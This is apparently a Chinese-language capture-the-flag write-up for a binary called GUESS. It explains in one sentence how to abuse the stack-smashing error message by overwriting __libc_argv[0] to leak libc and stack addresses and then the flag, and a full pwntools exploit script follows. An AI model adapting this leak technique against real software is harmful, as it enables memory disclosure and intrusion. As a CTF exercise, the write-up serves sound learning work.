3次覆盖__libc_argv[0]然后泄露出put的真实地址然偶clac出libc然后泄露出environ里面存的栈地址然后计算flag在栈上的偏移再次泄露即可
exp:
from pwn import *
from LibcSearcher import *
p=process('./GUESS')
elf=ELF('./GUESS')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
def debug():
gdb.attach(p)
p.recvuntil('flag')
#debug()
payload='a'*296+p64(elf.got['puts'])
p.sendline(payload)
put_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.success('put_addr: '+hex(put_addr))
#libc=LibcSearcher('puts',put_addr)
libcbase=put_addr-libc.symbols['puts']
envm=libcbase+libc.symbols['_environ']
log.success('envm: '+hex(envm))
p.recvuntil('flag')
payload='a'*296+p64(envm)
p.sendline(payload)
p.recvuntil('*** stack smashing detected ***:')
stack_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
log.success('stack_addr: '+hex(stack_addr))
p.recvuntil('flag')
payload='a'*296+p64(stack_addr-360)
p.sendline(payload)
p.interactive()
调试似乎出了点问题子进程的问题??(大师傅可以忽略)
